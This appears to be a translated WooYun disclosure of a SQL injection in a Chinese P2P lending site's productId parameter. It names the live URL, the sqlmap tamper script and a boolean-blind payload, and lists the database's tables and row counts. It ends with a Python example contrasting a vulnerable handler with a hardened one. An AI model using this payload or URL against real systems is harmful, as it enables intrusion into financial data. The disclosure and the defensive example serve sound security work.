
Vulnerability summary

Defect ID: wooyun-2015-0157727

Title: P2P finance security: SQL injection vulnerability in Mabudai (麻布贷)

Vendor: Mabudai (麻布贷)

Author: Nelion

Submitted: 2015-12-05 00:18

Fix deadline: 2016-01-19 00:20

Published: 2016-01-19 00:20

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 5

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-05: Actively contacting the vendor and awaiting acknowledgement; details not disclosed
2016-01-19: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The P2P lending platform Mabudai has a SQL injection vulnerability; confirming it requires the sqlmap tamper script space2morehash.py.

Detailed description:

Mabudai: Mabudai (Shanghai) Investment Management Co., Ltd. (hereafter "Mabudai"), a transformer of China's agricultural industry chain. Mabudai focuses on agriculture; its principles are responsibility, ideals and quality. (From the official website.)
1. Injection point:

http://www.mabudai.com/product/requestData?productId=549


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: productId=540 AND 1304=1304
---
[18:40:19] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:40:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5

Proof of vulnerability:

2. Databases:

available databases [1]:
[*] mabudai_deal


3. Tables in the database and their row counts:

Database: mabudai_deal
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| tender_repayment  | 6630    |
| transfer          | 3009    |
| tender            | 2127    |
| tender_loan       | 2127    |
| tender_unfreeze   | 2127    |
| product_repayment | 1146    |
| request_attach    | 487     |
| product           | 248     |
| product_content   | 248     |
| product_invest    | 248     |
| product_process   | 248     |
| product_protocol  | 248     |
| product_risk      | 248     |
| product_time      | 248     |
| request           | 81      |
| request_content   | 81      |
| request_reject    | 81      |
| bank_limit        | 78      |
| request_company   | 53      |
| request_field     | 36      |
| request_person    | 29      |
| brand_pic         | 21      |
| product_attach    | 13      |
| brand             | 5       |
| request_qqw       | 5       |
| request_finance   | 2       |
| product_field     | 1       |
+-------------------+---------+

Fix recommendation:

Filter the parameter.

Copyright notice: when reposting, please credit the source: Nelion@WooYun
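The finding above is a boolean-based blind injection in the numeric GET parameter productId, which is the classic result of concatenating a query-string value into SQL. The following is an added example, not code from the report or from the Mabudai site, showing what "parameter filtering" means in practice: a strict allowlist check that productId is a plain decimal integer, plus placeholder binding so the value never becomes SQL text. It uses an in-memory SQLite table with constructed rows standing in for the site's "product" table; the table columns and function names are assumptions for illustration, not the real schema.

```python
import re
import sqlite3
from typing import List, Optional, Tuple

# Constructed sample data; column names are illustrative, not the site's real schema.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, status TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [(540, "Sample product 540", "open"), (549, "Sample product 549", "closed")],
    )
    return conn


def request_data_vulnerable(conn: sqlite3.Connection, raw_product_id: str) -> List[Tuple[str, str]]:
    # The defect pattern behind the report: the raw query-string value is spliced into
    # the SQL text, so the database evaluates whatever expression the client supplied.
    sql = "SELECT name, status FROM product WHERE id = " + raw_product_id
    return conn.execute(sql).fetchall()


# Allowlist: a decimal integer of at most 10 digits, nothing else.
_PRODUCT_ID_RE = re.compile(r"[0-9]{1,10}")


def parse_product_id(raw: str) -> Optional[int]:
    # Returns the integer value for a well-formed id, or None for anything else
    # (spaces, keywords, comparison operators, comments, Unicode digits, ...).
    if _PRODUCT_ID_RE.fullmatch(raw) is None:
        return None
    return int(raw)


def request_data_hardened(conn: sqlite3.Connection, raw_product_id: str,
                          audit_log: List[str]) -> List[Tuple[str, str]]:
    # Two independent layers: input validation rejects anything that is not an integer,
    # and placeholder binding keeps the value out of the SQL text even if validation
    # were bypassed. Rejections are recorded so they can be alerted on.
    product_id = parse_product_id(raw_product_id)
    if product_id is None:
        audit_log.append(f"rejected productId={raw_product_id!r}")
        return []
    return conn.execute(
        "SELECT name, status FROM product WHERE id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = build_db()
    log: List[str] = []
    # The report's own payload: a true condition appended to a valid id.
    tampered = "540 AND 1304=1304"
    print("vulnerable:", request_data_vulnerable(conn, tampered))  # row 540 still returned
    print("hardened:  ", request_data_hardened(conn, tampered, log))  # []
    print("audit log: ", log)
```

In the vulnerable handler the database evaluates the appended condition, which is exactly the oracle a boolean-based blind test relies on; in the hardened handler the same input never reaches the database and leaves an audit entry, which is the signal a detection rule on the web tier should key on (non-numeric values in parameters that are declared numeric).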


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused